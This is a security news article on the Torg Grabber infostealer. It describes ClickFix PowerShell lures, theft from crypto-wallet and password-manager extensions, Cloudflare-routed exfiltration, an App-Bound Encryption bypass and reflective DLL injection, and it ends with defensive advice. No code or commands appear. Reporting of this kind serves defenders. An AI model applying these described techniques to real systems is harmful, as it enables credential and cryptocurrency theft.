New Torg Grabber Infostealer Targets 728 Crypto Wallets

New Torg Grabber Infostealer Malware Targets 728 Crypto Wallets

A newly identified information-stealing malware family named Torg Grabber is already making waves in the crimeware scene by plundering data from a vast ecosystem of browser extensions and crypto wallets. Researchers have observed Torg Grabber covertly harvesting sensitive information from as many as 850 browser extensions, with more than 700 of those extensions tied to cryptocurrency wallets. In practice, this means that a broad swath of wallet-related extensions—ranging from mainstream names to smaller, lesser-known projects—are within its crosshairs, exposing user credentials, tokens, and autofill data to a single malicious operator.

Initial access is gained through a technique known as ClickFix, which relies on clipboard hijacking to mislead victims into executing a tainted PowerShell command. Once the user execution is triggered, the malware proceeds to deploy its payload, exfiltrating data via a cascade of evasion and persistence strategies. Gen Digital, the cybersecurity firm tracking the campaign, notes that Torg Grabber is actively evolving: 334 unique samples were compiled in just three months, spanning December 2025 through February 2026. Under a rapid development cadence, new command-and-control (C2) servers have been registered on a near-weekly basis, signaling an expanding operator base and ongoing feature refinement.

Beyond wallets, the malware targets a broad spectrum of data sources. In addition to stealing wallet credentials, Torg Grabber is capable of ingesting data from 103 password managers and various two-factor authentication tools, as well as 19 note-taking applications. The breadth of targets underscores a design aimed at comprehensive credential harvesting and broader information exfiltration, rather than wallet theft alone.

Technical evolution and defense-evasion techniques are central to Torg Grabber’s runtime. In a detailed technical report, researchers describe an evolution from Telegram-based exfiltration and a custom encrypted TCP protocol to a streamlined HTTPS channel routed through Cloudflare infrastructure. This shift enables chunked data uploads and resilient payload delivery, while maintaining a low network profile that blends with legitimate traffic. The malware employs multiple anti-analysis safeguards, layered obfuscation, and direct system calls with reflective loading to keep the final payload resident in memory and harder to interrupt.

A notable development milestone occurred on December 22, 2025, when Torg Grabber added an App-Bound Encryption (ABE) bypass aimed at defeating cookie protections in major browsers, including Chrome, Brave, Edge, Vivaldi, and Opera. This capability complements the malware’s other technical tricks and broadens its ability to harvest session data and other sensitive browser artifacts. In parallel with these browser-focused techniques, researchers have identified a standalone tool nicknamed Underground, used for extracting browser data. Underground injects a DLL reflectively into browsers to access the Chrome Master Encryption Key via the COM Elevation Service, a technique that mirrors methods seen in other recent information-stealer campaigns.

The scope of data theft is underscored by Torg Grabber’s extensive wallet-targeting list. The malware scanning covers 25 Chromium-based browsers and 8 Firefox variants, aiming to harvest credentials, cookies, and autofill data. Of the 850 extensions it targets, a staggering 728 are cryptocurrency-wallet extensions, effectively spanning a wide range of wallet implementations—from the most widely used to niche, community-driven projects. Prominent wallet names appear in the threat’s crosshairs, including MetaMask, Phantom, Trust Wallet, Coinbase, Binance, Exodus, TronLink, Ronin, OKX, Keplr, Rabby, Sui, and Solflare, among others. The list extends deep into the long tail, capturing numerous wallets with varying adoption but shared risk of credential leakage.

In addition to wallet-related data, Torg Grabber targets password management and authentication extensions such as LastPass, 1Password, Bitwarden, KeePass, NordPass, Dashlane, Proton Pass, Enpass, Psono, Pleasant Password Server, heylogin, 2FAAuth, GAuth, TOTP Authenticator, and Akamai MFA. The malware’s data collection scope also includes information from Discord, Telegram, Steam, VPN apps, FTP clients, email clients, desktop cryptocurrency wallet apps, and other software that can reveal sensitive operational details about the user’s digital environment.

Beyond credential theft, Torg Grabber is capable of profiling the host system. It creates a hardware fingerprint, catalogs installed software including a wide swath of antivirus tools (at least 24 are visible in its reconnaissance), and can capture screenshots of the user’s desktop. The malware is designed to exfiltrate additional data such as files from the user’s Desktop and Documents folders, further expanding the potential data-gathering surface. The payload delivery mechanism relies on ChaCha-encrypted, zlib-compressed data transmitted from the C2, enabling the attacker to deliver shellcode in a compact, resilient form while remaining difficult to detect through conventional payload analysis.

Gen Digital cautions that Torg Grabber is still in a high-velocity state of development. The operator base is expanding, and new C2 domains are registered weekly, with at least 40 unique tags identified in the course of the latest analysis. This combination of aggressive expansion, broad target scope, and sophisticated evasion places Torg Grabber among the more notable information-stealer campaigns observed in the wild during late 2025 and early 2026.

Contextual notes from related security research indicate that threats like Torg Grabber are part of a broader pattern in which attackers increasingly blend browser data theft with wallet-specific espionage. The rapid adoption of cloud-based exfiltration channels and encrypted data transfers highlights the evolving risk landscape for individuals who reuse passwords across wallet and authentication tools, as well as for organizations that rely on browser-based crypto workflows. As the threat continues to mature, defenders are likely to encounter more sophisticated anti-analysis techniques, reinforced in-memory payloads, and diversified data targets that stretch well beyond financial credentials into the realm of personal and organizational information.

In related industry reportage, analysts emphasize that such families reflect a trend toward highly modular, extensible infostealers that can adapt to target ecosystems with minimal operational downtime. The combination of clipboard-based initial access, broad extension targeting, and cloud-enabled exfiltration makes early detection challenging, as the malware can blend into normal browser traffic and legitimate Cloudflare-protected channels. For security teams, the implications are clear: protection must extend beyond password hygiene and wallet security to include robust endpoint telemetry, browser extension vetting, and network monitoring capable of spotting anomalous, high-volume data exfiltration patterns even when the traffic appears benign.

As this campaign continues to unfold, organizations and individuals who engage in cryptocurrency activities should remain vigilant about the integrity of their browser environments, the authenticity of any extensions installed, and the security posture of systems that manage sensitive credentials and authentication data. Regular software updates, careful review of installed extensions, and prompt incident response when suspicious PowerShell activity or clipboard anomalies are detected will be essential components of a resilient defensive strategy in the face of evolving infostealer threats like Torg Grabber.